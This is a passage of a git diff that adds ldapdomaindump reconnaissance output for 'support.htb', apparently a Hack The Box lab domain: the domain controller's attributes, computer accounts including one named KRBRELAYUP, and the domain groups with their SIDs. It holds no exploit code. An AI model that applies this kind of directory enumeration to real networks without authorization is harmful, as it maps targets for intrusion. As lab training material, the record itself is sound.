+ "Windows Server 2022 Standard"
+ ],
+ "operatingSystemVersion": [
+ "10.0 (20348)"
+ ],
+ "primaryGroupID": [
+ 516
+ ],
+ "pwdLastSet": [
+ "2022-08-19 05:02:10.563829+00:00"
+ ],
+ "rIDSetReferences": [
+ "CN=RID Set,CN=DC,OU=Domain Controllers,DC=support,DC=htb"
+ ],
+ "sAMAccountName": [
+ "DC$"
+ ],
+ "sAMAccountType": [
+ 805306369
+ ],
+ "serverReferenceBL": [
+ "CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb"
+ ],
+ "servicePrincipalName": [
+ "Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dc.support.htb",
+ "ldap/dc.support.htb/ForestDnsZones.support.htb",
+ "ldap/dc.support.htb/DomainDnsZones.support.htb",
+ "DNS/dc.support.htb",
+ "GC/dc.support.htb/support.htb",
+ "RestrictedKrbHost/dc.support.htb",
+ "RestrictedKrbHost/DC",
+ "RPC/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb",
+ "HOST/DC/SUPPORT",
+ "HOST/dc.support.htb/SUPPORT",
+ "HOST/DC",
+ "HOST/dc.support.htb",
+ "HOST/dc.support.htb/support.htb",
+ "E3514235-4B06-11D1-AB04-00C04FC2DCD2/290156e5-22cb-4f1b-9b96-5516d84c363c/support.htb",
+ "ldap/DC/SUPPORT",
+ "ldap/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb",
+ "ldap/dc.support.htb/SUPPORT",
+ "ldap/DC",
+ "ldap/dc.support.htb",
+ "ldap/dc.support.htb/support.htb"
+ ],
+ "uSNChanged": [
+ 81989
+ ],
+ "uSNCreated": [
+ 12293
+ ],
+ "userAccountControl": [
+ 532480
+ ],
+ "whenChanged": [
+ "2022-08-19 05:02:10+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=DC,OU=Domain Controllers,DC=support,DC=htb"
+}] \ No newline at end of file
diff --git a/support/domaindump/domain_computers_by_os.html b/support/domaindump/domain_computers_by_os.html
new file mode 100644
index 0000000..76e9f9e
--- /dev/null
+++ b/support/domaindump/domain_computers_by_os.html
@@ -0,0 +1,41 @@
+<!DOCTYPE html>
+<html>
+<head><meta charset="UTF-8"><style type="text/css">tbody th {
+ border: 1px solid #000;
+}
+tbody td {
+ border: 1px solid #ababab;
+ border-spacing: 0px;
+ padding: 4px;
+ border-collapse: collapse;
+}
+body {
+ font-family: verdana;
+}
+table {
+ font-size: 13px;
+ border-collapse: collapse;
+ width: 100%;
+}
+tbody tr:nth-child(odd) td {
+ background-color: #eee;
+}
+tbody tr:hover td {
+ background-color: lightblue;
+}
+thead td {
+ font-size: 19px;
+ font-weight: bold;
+ padding: 10px 0px;
+}
+</style></head><body><table><thead><tr><td colspan="11" id="cn_Unknown">Unknown</td></tr></thead><tbody><tr><th>CN</th><th>SAM Name</th><th>DNS Hostname</th><th>Operating System</th><th>Service Pack</th><th>OS Version</th><th>lastLogon</th><th>Flags</th><th>Created on</th><th>SID</th><th>description</th></tr>
+<tr><td>meggiepc</td><td>meggiepc$</td><td>meggiepc.support.htb</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>01/01/01 00:00:00</td><td>WORKSTATION_ACCOUNT</td><td>08/19/22 15:08:48</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-5102">5102</abbr></td><td>&nbsp;</td></tr>
+<tr><td>KRBRELAYUP</td><td>KRBRELAYUP$</td><td>KRBRELAYUP.support.htb</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>01/01/01 00:00:00</td><td>WORKSTATION_ACCOUNT</td><td>08/19/22 15:01:17</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-5101">5101</abbr></td><td>&nbsp;</td></tr>
+</tbody>
+<thead><tr><td colspan="11" id="cn_Windows_10_Pro">Windows 10 Pro</td></tr></thead><tbody><tr><th>CN</th><th>SAM Name</th><th>DNS Hostname</th><th>Operating System</th><th>Service Pack</th><th>OS Version</th><th>lastLogon</th><th>Flags</th><th>Created on</th><th>SID</th><th>description</th></tr>
+<tr><td>MANAGEMENT</td><td>MANAGEMENT$</td><td>Management.support.htb</td><td>Windows 10 Pro</td><td>&nbsp;</td><td>10.0 (19042)</td><td>07/26/22 16:01:56</td><td>WORKSTATION_ACCOUNT</td><td>07/21/22 13:19:20</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-2601">2601</abbr></td><td>&nbsp;</td></tr>
+</tbody>
+<thead><tr><td colspan="11" id="cn_Windows_Server_2022_Standard">Windows Server 2022 Standard</td></tr></thead><tbody><tr><th>CN</th><th>SAM Name</th><th>DNS Hostname</th><th>Operating System</th><th>Service Pack</th><th>OS Version</th><th>lastLogon</th><th>Flags</th><th>Created on</th><th>SID</th><th>description</th></tr>
+<tr><td>DC</td><td>DC$</td><td>dc.support.htb</td><td>Windows Server 2022 Standard</td><td>&nbsp;</td><td>10.0 (20348)</td><td>08/19/22 12:31:59</td><td>SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1000">1000</abbr></td><td>&nbsp;</td></tr>
+</tbody>
+</table></body></html> \ No newline at end of file
diff --git a/support/domaindump/domain_groups.grep b/support/domaindump/domain_groups.grep
new file mode 100644
index 0000000..7f5661b
--- /dev/null
+++ b/support/domaindump/domain_groups.grep
@@ -0,0 +1,50 @@
+cn sAMAccountName memberOf description whenCreated whenChanged objectSid
+Shared Support Accounts Shared Support Accounts 05/28/22 11:11:32 05/28/22 11:12:04 S-1-5-21-1677581083-3380853377-188903654-1103
+DnsUpdateProxy DnsUpdateProxy DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers). 05/28/22 11:05:17 05/28/22 11:05:17 S-1-5-21-1677581083-3380853377-188903654-1102
+DnsAdmins DnsAdmins DNS Administrators Group 05/28/22 11:05:17 05/28/22 11:05:17 S-1-5-21-1677581083-3380853377-188903654-1101
+Enterprise Key Admins Enterprise Key Admins Members of this group can perform administrative actions on key objects within the forest. 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-21-1677581083-3380853377-188903654-527
+Key Admins Key Admins Members of this group can perform administrative actions on key objects within the domain. 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-21-1677581083-3380853377-188903654-526
+Protected Users Protected Users Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information. 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-525
+Cloneable Domain Controllers Cloneable Domain Controllers Members of this group that are domain controllers may be cloned. 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-522
+Enterprise Read-only Domain Controllers Enterprise Read-only Domain Controllers Members of this group are Read-Only Domain Controllers in the enterprise 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-498
+Read-only Domain Controllers Read-only Domain Controllers Denied RODC Password Replication Group Members of this group are Read-Only Domain Controllers in the domain 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-21-1677581083-3380853377-188903654-521
+Denied RODC Password Replication Group Denied RODC Password Replication Group Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-572
+Allowed RODC Password Replication Group Allowed RODC Password Replication Group Members in this group can have their passwords replicated to all read-only domain controllers in the domain 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-571
+Terminal Server License Servers Terminal Server License Servers Members of this group can update user accounts in Active Directory with information about license issuance, for the purpose of tracking and reporting TS Per User CAL usage 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-32-561
+Windows Authorization Access Group Windows Authorization Access Group Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-32-560
+Incoming Forest Trust Builders Incoming Forest Trust Builders Members of this group can create incoming, one-way trusts to this forest 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-32-557
+Pre-Windows 2000 Compatible Access Pre-Windows 2000 Compatible Access A backward compatibility group which allows read access on all users and groups in the domain 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-32-554
+Account Operators Account Operators Members can administer domain user and group accounts 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-32-548
+Server Operators Server Operators Members can administer domain servers 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-32-549
+RAS and IAS Servers RAS and IAS Servers Servers in this group can access remote access properties of users 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-553
+Group Policy Creator Owners Group Policy Creator Owners Denied RODC Password Replication Group Members in this group can modify group policy for the domain 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-520
+Domain Guests Domain Guests Guests All domain guests 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-514
+Domain Users Domain Users Users All domain users 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-513
+Domain Admins Domain Admins Denied RODC Password Replication Group, Administrators Designated administrators of the domain 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-21-1677581083-3380853377-188903654-512
+Cert Publishers Cert Publishers Denied RODC Password Replication Group Members of this group are permitted to publish certificates to the directory 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-517
+Enterprise Admins Enterprise Admins Denied RODC Password Replication Group, Administrators Designated administrators of the enterprise 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-21-1677581083-3380853377-188903654-519
+Schema Admins Schema Admins Denied RODC Password Replication Group Designated administrators of the schema 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-21-1677581083-3380853377-188903654-518
+Domain Controllers Domain Controllers Denied RODC Password Replication Group All domain controllers in the domain 05/28/22 11:03:43 05/28/22 11:19:47 S-1-5-21-1677581083-3380853377-188903654-516
+Domain Computers Domain Computers All workstations and servers joined to the domain 05/28/22 11:03:43 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-515
+Storage Replica Administrators Storage Replica Administrators Members of this group have complete and unrestricted access to all features of Storage Replica. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-582
+Remote Management Users Remote Management Users Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. 05/28/22 11:01:56 05/28/22 11:12:04 S-1-5-32-580
+Access Control Assistance Operators Access Control Assistance Operators Members of this group can remotely query authorization attributes and permissions for resources on this computer. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-579
+Hyper-V Administrators Hyper-V Administrators Members of this group have complete and unrestricted access to all features of Hyper-V. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-578
+RDS Management Servers RDS Management Servers Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-577
+RDS Endpoint Servers RDS Endpoint Servers Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run. This group needs to be populated on servers running RD Connection Broker. RD Session Host servers and RD Virtualization Host servers used in the deployment need to be in this group. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-576
+RDS Remote Access Servers RDS Remote Access Servers Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources. In Internet-facing deployments, these servers are typically deployed in an edge network. This group needs to be populated on servers running RD Connection Broker. RD Gateway servers and RD Web Access servers used in the deployment need to be in this group. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-575
+Certificate Service DCOM Access Certificate Service DCOM Access Members of this group are allowed to connect to Certification Authorities in the enterprise 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-574
+Event Log Readers Event Log Readers Members of this group can read event logs from local machine 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-573
+Cryptographic Operators Cryptographic Operators Members are authorized to perform cryptographic operations. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-569
+IIS_IUSRS IIS_IUSRS Built-in group used by Internet Information Services. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-568
+Distributed COM Users Distributed COM Users Members are allowed to launch, activate and use Distributed COM objects on this machine. 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-562
+Performance Log Users Performance Log Users Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-559
+Performance Monitor Users Performance Monitor Users Members of this group can access performance counter data locally and remotely 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-558
+Network Configuration Operators Network Configuration Operators Members in this group can have some administrative privileges to manage configuration of networking features 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-556
+Remote Desktop Users Remote Desktop Users Members in this group are granted the right to logon remotely 05/28/22 11:01:56 05/28/22 11:01:56 S-1-5-32-555
+Replicator Replicator Supports file replication in a domain 05/28/22 11:01:56 05/28/22 11:19:47 S-1-5-32-552
+Backup Operators Backup Operators Backup Operators can override security restrictions for the sole purpose of backing up or restoring files 05/28/22 11:01:56 05/28/22 11:19:47 S-1-5-32-551
+Print Operators Print Operators Members can administer printers installed on domain controllers 05/28/22 11:01:56 05/28/22 11:19:47 S-1-5-32-550
+Guests Guests Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted 05/28/22 11:01:56 05/28/22 11:03:43 S-1-5-32-546
+Users Users Users are prevented from making accidental or intentional system-wide changes and can run most applications 05/28/22 11:01:56 05/28/22 11:03:43 S-1-5-32-545
+Administrators Administrators Administrators have complete and unrestricted access to the computer/domain 05/28/22 11:01:56 05/28/22 11:19:47 S-1-5-32-544 \ No newline at end of file
diff --git a/support/domaindump/domain_groups.html b/support/domaindump/domain_groups.html
new file mode 100644
index 0000000..e9c5ec4
--- /dev/null
+++ b/support/domaindump/domain_groups.html
@@ -0,0 +1,82 @@
+<!DOCTYPE html>
+<html>
+<head><meta charset="UTF-8"><style type="text/css">tbody th {
+ border: 1px solid #000;
+}
+tbody td {
+ border: 1px solid #ababab;
+ border-spacing: 0px;
+ padding: 4px;
+ border-collapse: collapse;
+}
+body {
+ font-family: verdana;
+}
+table {
+ font-size: 13px;
+ border-collapse: collapse;
+ width: 100%;
+}
+tbody tr:nth-child(odd) td {
+ background-color: #eee;
+}
+tbody tr:hover td {
+ background-color: lightblue;
+}
+thead td {
+ font-size: 19px;
+ font-weight: bold;
+ padding: 10px 0px;
+}
+</style></head><body><table><thead><tr><td colspan="7" id="cn_Domain_groups">Domain groups</td></tr></thead><tbody><tr><th>CN</th><th>SAM Name</th><th>Member of groups</th><th>description</th><th>Created on</th><th>Changed on</th><th>SID</th></tr>
+<tr><td>Shared Support Accounts</td><td>Shared Support Accounts</td><td>&nbsp;</td><td>&nbsp;</td><td>05/28/22 11:11:32</td><td>05/28/22 11:12:04</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1103">1103</abbr></td></tr>
+<tr><td>DnsUpdateProxy</td><td>DnsUpdateProxy</td><td>&nbsp;</td><td>DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).</td><td>05/28/22 11:05:17</td><td>05/28/22 11:05:17</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1102">1102</abbr></td></tr>
+<tr><td>DnsAdmins</td><td>DnsAdmins</td><td>&nbsp;</td><td>DNS Administrators Group</td><td>05/28/22 11:05:17</td><td>05/28/22 11:05:17</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1101">1101</abbr></td></tr>
+<tr><td>Enterprise Key Admins</td><td>Enterprise Key Admins</td><td>&nbsp;</td><td>Members of this group can perform administrative actions on key objects within the forest.</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-527">527</abbr></td></tr>
+<tr><td>Key Admins</td><td>Key Admins</td><td>&nbsp;</td><td>Members of this group can perform administrative actions on key objects within the domain.</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-526">526</abbr></td></tr>
+<tr><td>Protected Users</td><td>Protected Users</td><td>&nbsp;</td><td>Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-525">525</abbr></td></tr>
+<tr><td>Cloneable Domain Controllers</td><td>Cloneable Domain Controllers</td><td>&nbsp;</td><td>Members of this group that are domain controllers may be cloned.</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-522">522</abbr></td></tr>
+<tr><td>Enterprise Read-only Domain Controllers</td><td>Enterprise Read-only Domain Controllers</td><td>&nbsp;</td><td>Members of this group are Read-Only Domain Controllers in the enterprise</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-498">498</abbr></td></tr>
+<tr><td>Read-only Domain Controllers</td><td>Read-only Domain Controllers</td><td><a href="domain_users_by_group.html#cn_Denied_RODC_Password_Replication_Group" title="CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb">Denied RODC Password Replication Group</a></td><td>Members of this group are Read-Only Domain Controllers in the domain</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-521">521</abbr></td></tr>
+<tr><td>Denied RODC Password Replication Group</td><td>Denied RODC Password Replication Group</td><td>&nbsp;</td><td>Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-572">572</abbr></td></tr>
+<tr><td>Allowed RODC Password Replication Group</td><td>Allowed RODC Password Replication Group</td><td>&nbsp;</td><td>Members in this group can have their passwords replicated to all read-only domain controllers in the domain</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-571">571</abbr></td></tr>
+<tr><td>Terminal Server License Servers</td><td>Terminal Server License Servers</td><td>&nbsp;</td><td>Members of this group can update user accounts in Active Directory with information about license issuance, for the purpose of tracking and reporting TS Per User CAL usage</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-32-561">561</abbr></td></tr>
+<tr><td>Windows Authorization Access Group</td><td>Windows Authorization Access Group</td><td>&nbsp;</td><td>Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-32-560">560</abbr></td></tr>
+<tr><td>Incoming Forest Trust Builders</td><td>Incoming Forest Trust Builders</td><td>&nbsp;</td><td>Members of this group can create incoming, one-way trusts to this forest</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-32-557">557</abbr></td></tr>
+<tr><td>Pre-Windows 2000 Compatible Access</td><td>Pre-Windows 2000 Compatible Access</td><td>&nbsp;</td><td>A backward compatibility group which allows read access on all users and groups in the domain</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-32-554">554</abbr></td></tr>
+<tr><td>Account Operators</td><td>Account Operators</td><td>&nbsp;</td><td>Members can administer domain user and group accounts</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-32-548">548</abbr></td></tr>
+<tr><td>Server Operators</td><td>Server Operators</td><td>&nbsp;</td><td>Members can administer domain servers</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-32-549">549</abbr></td></tr>
+<tr><td>RAS and IAS Servers</td><td>RAS and IAS Servers</td><td>&nbsp;</td><td>Servers in this group can access remote access properties of users</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-553">553</abbr></td></tr>
+<tr><td>Group Policy Creator Owners</td><td>Group Policy Creator Owners</td><td><a href="domain_users_by_group.html#cn_Denied_RODC_Password_Replication_Group" title="CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb">Denied RODC Password Replication Group</a></td><td>Members in this group can modify group policy for the domain</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-520">520</abbr></td></tr>
+<tr><td>Domain Guests</td><td>Domain Guests</td><td><a href="domain_users_by_group.html#cn_Guests" title="CN=Guests,CN=Builtin,DC=support,DC=htb">Guests</a></td><td>All domain guests</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-514">514</abbr></td></tr>
+<tr><td>Domain Users</td><td>Domain Users</td><td><a href="domain_users_by_group.html#cn_Users" title="CN=Users,CN=Builtin,DC=support,DC=htb">Users</a></td><td>All domain users</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-513">513</abbr></td></tr>
+<tr><td>Domain Admins</td><td>Domain Admins</td><td><a href="domain_users_by_group.html#cn_Denied_RODC_Password_Replication_Group" title="CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb">Denied RODC Password Replication Group</a>, <a href="domain_users_by_group.html#cn_Administrators" title="CN=Administrators,CN=Builtin,DC=support,DC=htb">Administrators</a></td><td>Designated administrators of the domain</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-512">512</abbr></td></tr>
+<tr><td>Cert Publishers</td><td>Cert Publishers</td><td><a href="domain_users_by_group.html#cn_Denied_RODC_Password_Replication_Group" title="CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb">Denied RODC Password Replication Group</a></td><td>Members of this group are permitted to publish certificates to the directory</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-517">517</abbr></td></tr>
+<tr><td>Enterprise Admins</td><td>Enterprise Admins</td><td><a href="domain_users_by_group.html#cn_Denied_RODC_Password_Replication_Group" title="CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb">Denied RODC Password Replication Group</a>, <a href="domain_users_by_group.html#cn_Administrators" title="CN=Administrators,CN=Builtin,DC=support,DC=htb">Administrators</a></td><td>Designated administrators of the enterprise</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-519">519</abbr></td></tr>
+<tr><td>Schema Admins</td><td>Schema Admins</td><td><a href="domain_users_by_group.html#cn_Denied_RODC_Password_Replication_Group" title="CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb">Denied RODC Password Replication Group</a></td><td>Designated administrators of the schema</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-518">518</abbr></td></tr>
+<tr><td>Domain Controllers</td><td>Domain Controllers</td><td><a href="domain_users_by_group.html#cn_Denied_RODC_Password_Replication_Group" title="CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb">Denied RODC Password Replication Group</a></td><td>All domain controllers in the domain</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-516">516</abbr></td></tr>
+<tr><td>Domain Computers</td><td>Domain Computers</td><td>&nbsp;</td><td>All workstations and servers joined to the domain</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-515">515</abbr></td></tr>
+<tr><td>Storage Replica Administrators</td><td>Storage Replica Administrators</td><td>&nbsp;</td><td>Members of this group have complete and unrestricted access to all features of Storage Replica.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-582">582</abbr></td></tr>
+<tr><td>Remote Management Users</td><td>Remote Management Users</td><td>&nbsp;</td><td>Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:12:04</td><td><abbr title="S-1-5-32-580">580</abbr></td></tr>
+<tr><td>Access Control Assistance Operators</td><td>Access Control Assistance Operators</td><td>&nbsp;</td><td>Members of this group can remotely query authorization attributes and permissions for resources on this computer.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-579">579</abbr></td></tr>
+<tr><td>Hyper-V Administrators</td><td>Hyper-V Administrators</td><td>&nbsp;</td><td>Members of this group have complete and unrestricted access to all features of Hyper-V.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-578">578</abbr></td></tr>
+<tr><td>RDS Management Servers</td><td>RDS Management Servers</td><td>&nbsp;</td><td>Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-577">577</abbr></td></tr>
+<tr><td>RDS Endpoint Servers</td><td>RDS Endpoint Servers</td><td>&nbsp;</td><td>Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run. This group needs to be populated on servers running RD Connection Broker. RD Session Host servers and RD Virtualization Host servers used in the deployment need to be in this group.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-576">576</abbr></td></tr>
+<tr><td>RDS Remote Access Servers</td><td>RDS Remote Access Servers</td><td>&nbsp;</td><td>Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources. In Internet-facing deployments, these servers are typically deployed in an edge network. This group needs to be populated on servers running RD Connection Broker. RD Gateway servers and RD Web Access servers used in the deployment need to be in this group.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-575">575</abbr></td></tr>
+<tr><td>Certificate Service DCOM Access</td><td>Certificate Service DCOM Access</td><td>&nbsp;</td><td>Members of this group are allowed to connect to Certification Authorities in the enterprise</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-574">574</abbr></td></tr>
+<tr><td>Event Log Readers</td><td>Event Log Readers</td><td>&nbsp;</td><td>Members of this group can read event logs from local machine</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-573">573</abbr></td></tr>
+<tr><td>Cryptographic Operators</td><td>Cryptographic Operators</td><td>&nbsp;</td><td>Members are authorized to perform cryptographic operations.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-569">569</abbr></td></tr>
+<tr><td>IIS_IUSRS</td><td>IIS_IUSRS</td><td>&nbsp;</td><td>Built-in group used by Internet Information Services.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-568">568</abbr></td></tr>
+<tr><td>Distributed COM Users</td><td>Distributed COM Users</td><td>&nbsp;</td><td>Members are allowed to launch, activate and use Distributed COM objects on this machine.</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-562">562</abbr></td></tr>
+<tr><td>Performance Log Users</td><td>Performance Log Users</td><td>&nbsp;</td><td>Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-559">559</abbr></td></tr>
+<tr><td>Performance Monitor Users</td><td>Performance Monitor Users</td><td>&nbsp;</td><td>Members of this group can access performance counter data locally and remotely</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-558">558</abbr></td></tr>
+<tr><td>Network Configuration Operators</td><td>Network Configuration Operators</td><td>&nbsp;</td><td>Members in this group can have some administrative privileges to manage configuration of networking features</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-556">556</abbr></td></tr>
+<tr><td>Remote Desktop Users</td><td>Remote Desktop Users</td><td>&nbsp;</td><td>Members in this group are granted the right to logon remotely</td><td>05/28/22 11:01:56</td><td>05/28/22 11:01:56</td><td><abbr title="S-1-5-32-555">555</abbr></td></tr>
+<tr><td>Replicator</td><td>Replicator</td><td>&nbsp;</td><td>Supports file replication in a domain</td><td>05/28/22 11:01:56</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-32-552">552</abbr></td></tr>
+<tr><td>Backup Operators</td><td>Backup Operators</td><td>&nbsp;</td><td>Backup Operators can override security restrictions for the sole purpose of backing up or restoring files</td><td>05/28/22 11:01:56</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-32-551">551</abbr></td></tr>
+<tr><td>Print Operators</td><td>Print Operators</td><td>&nbsp;</td><td>Members can administer printers installed on domain controllers</td><td>05/28/22 11:01:56</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-32-550">550</abbr></td></tr>
